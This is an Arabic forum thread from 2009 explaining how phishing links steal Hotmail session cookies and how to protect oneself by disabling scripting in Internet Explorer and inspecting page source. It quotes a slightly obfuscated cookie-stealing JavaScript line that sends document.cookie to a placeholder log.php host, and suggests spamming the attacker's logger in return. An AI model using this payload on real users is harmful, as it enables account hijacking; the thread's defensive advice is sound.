التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام


قديم 09-01-2009, 07:26 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية EDMN HkR
 

 

 
إحصائية العضو





EDMN HkR غير متواجد حالياً

إرسال رسالة عبر MSN إلى EDMN HkR

 

 

إحصائية الترشيح

عدد النقاط : 10
EDMN HkR is on a distinguished road

Talking حماية بردك من الاختراق عبر سرقة الكوكيز






بسم الله الرحمن الرحيم
اليوم عملت شرح لموضوع سرقة بريد الهوت ميل
وهى طريقة سرقة ملف الكوكيز الخاص بيك بعد دخولك على موقع السارق

عارفين ان ثغرة xss للهوتميل اتقفلت من زمااان
لكن ظهرت ثغرات جديده حاليا وهيا برايفت عند ناس
ومناسبة الشرح ده اني لاحظت مئات الايميلات الثلاثية والثنائيات يخترقوهم هؤلاء اللي معاهم الثغرة


ماعلينا اليوم بعد ما تقرأ الموضوع ده انسى ان واحد يضحك عليك


نفترض وصلتلك رسالة على البريد مضمونها
اهلاً بك يا فلان
مبروك ربحت 10000 ريال
ادخل على الرابط التالي علشان تاخد الـ 10000 ريال
طبعا انت فرحان ودخلت علطول

وبعد ما دخلت ما لقيت شيء
ممكن تلاقي صفحة بيضة ممكن تلاقي صورة بس

تقول خسارة مليش نصيب في المبلغ
طبعا بعدها بدقايق كان المخترق جاتله رساله ملف الكوكيز تبعك
ودخل غير كل البيانات

وراح الاميل عليك طبعا انت تقول
الاميل انا كنت حميه و ماقبلتش اي حاجة من حد وكيف اميلى ينسرق
وبعدها طبعا السارق دخل سحب باقى البيانات ومنها الدومين
واخترق منتداك كمان
وكل ده من اميلك
لاااااااااااااا

دلوقتي بقى انا هخليك انت الى تضحك عليه وتحرق دمه
خليكو معايا وانتبهو جيدا

ده مثال للرسالة اللي جاتلك وكان فيها الرابط


استنة رايح فين اياك تفتح الرابط !

هتفتحه بس بعد ما تتبع الخطوات التالية :
تعديل بسيط على اعدادات انترنت اكسبلورر
روح على tools واختار internet options اللي هو اخر خيار



بعدين تروح على security واضغط على custom level



بعد كده ابحث عن Active Scripting وهي خاصية الجافا سكربت
قم بتعطيلها من خلال اختيارك Disable



الان انت فى امان ولو فتحت الصفحة مش هينسرق ملف الكوكيز بتاعك
ادخل على الصفحة بقلب جامد بعد التاكد من ان خاصية الجافا وجعلها دسبلاي

طيب الان انت دخلت الصفحة وعاوز تتأكد اذا ده واحد هدفه يسرق ايميلك والا لأ
تعمل ايه ؟!
روح من القائمة view اختار Source
هيفتحلك مصدر الصفحة في مفكره
فيها اكواد الصفحة
طيب ابحث فيها عن الكود ده

هذه الصورة مصغره ... نقره على هذا الشريط لعرض الصوره بالمقاس الحقيقي ... المقاس الحقيقي 776x414 .

طبعا اكيد انتم شايفين ده عباره عن كود وفى اخره رابط السكربت بتاع المخترق علشان يسرق الكوكيز
وده هو الملف بتاع سرقة الكوكيز معمول بخاصية الجافا سكربت عشان كده قلتلك عطل الجافا سكربت في المتصفح

طبعا انت شفت الرابط الى فى اخر الكود
www.xxx.com/vb/add.js


طيب دلوقتى انت عرفت المصدر
دلوقتى بقى انت عايز تحرق دمه

وتعرفه انك انسان عاقل وفاهم
ادخل على المتصفح
وحط رابط ملف سرقة الكوكيز بتاع المخترق
www.xxx.com/vb/add.js
هيطلب منك انك تحمله
حمله على جهازك
واضغط عليه كلك يمين واختار open with واختار النوت باد



طبعا انت دخلت على ملف الجافا سكربت لقيته كده
طبعا انت مش فاهم ايه ده ؟؟؟؟؟؟
اقولك انا يا سيدى
ده ملف سرقة الكوكيز
ما علينا مش هطول عليكم وهقولكم الباقى

عايز دلوقتى تجنينه وتخنقه وتخليه يشيييييييييط

lo cat ion .h ref='http://www.xxxx.com/xxx/log.php?in de x='+escape(d ocu ment.c oo kie);
طبعا هو فى الملف log.php فيه اميل المخترق
تمااام دلوقتى احنا عايزين نوصله التحية بتاعتنا ونعرفه ان لعبته اتقفشت
هتكتب


كود PHP:
www.xxxxx.com/xxx/log.php?index= وهنا اكتب الكلام الى عايزه يوصل للضحية

مثل

هذه الصورة مصغره ... نقره على هذا الشريط لعرض الصوره بالمقاس الحقيقي ... المقاس الحقيقي 766x101 .

طيب تمام
طبعا علطول بيروح تبيلغ للمخترق ان الكوكيز بتاع وصله
وهيدخل وهو مبسوط
وهيلاقى فى الرساله بدل الكوكيز الكلام بتاعك اللي انت كتبته

شوفو مثال :



طبعا هو ممكن ينفجر من الغيظ

كده خلص موضوعنا
ونصيحة للجميع
اعمل لايميلك سؤال سري واجابة
وايميل بديل يكون بتاعك علشان تسترجعه وقت اللزوم
وبرنامج حماية قوي علشان يحميك من ملفات التجسس

واهم شيء استخدام متصفح غير الاكسبلورر

ممكن تستخدمو فايرفوكس مع التحديث دائما مثلي

تحياتي للجميع

EGY-MaF!4




plhdm fv]; lk hghojvhr ufv svrm hg;,;d.


التعديل الأخير تم بواسطة EDMN HkR ; 09-01-2009 الساعة 07:32 PM.

   

رد مع اقتباس
قديم 09-03-2009, 03:54 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية >الشرس<
 

 

 
إحصائية العضو





>الشرس< غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
>الشرس< is on a distinguished road

افتراضي


شكرا لك على الشرح الوافي

   

رد مع اقتباس
قديم 09-04-2009, 06:28 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية p4w
 

 

 
إحصائية العضو







p4w غير متواجد حالياً

إرسال رسالة عبر MSN إلى p4w

 

 

إحصائية الترشيح

عدد النقاط : 10
p4w is on a distinguished road

افتراضي


MERCI

التوقيع

[IMG]http://www7.0zz0.com/2011/05/15/12/796181342.jpg[/IMG]

 

   

رد مع اقتباس
قديم 09-06-2009, 09:13 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
إحصائية العضو







وائل الكرخي غير متواجد حالياً

إرسال رسالة عبر MSN إلى وائل الكرخي

 

 

إحصائية الترشيح

عدد النقاط : 10
وائل الكرخي is on a distinguished road

افتراضي


شكرا الك علئ هذي الطريقة الجميلة

التوقيع

[align=right]ارجو من الاداة تغيرر اسمي الئ


the spider[/align]

 

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
أخر اصدرات برامج الاختراق+سرقة كمرة الهوتميل + الى اخره zahgan قـسـم الـبـريد الإلـكتروني والحسابات العامة 9 02-14-2010 05:02 PM
طريقك الى حماية منتداك من الاختراق احمى المنتدى 100% THE GHOST قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات 2 09-06-2008 05:15 AM


الساعة الآن 06:08 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0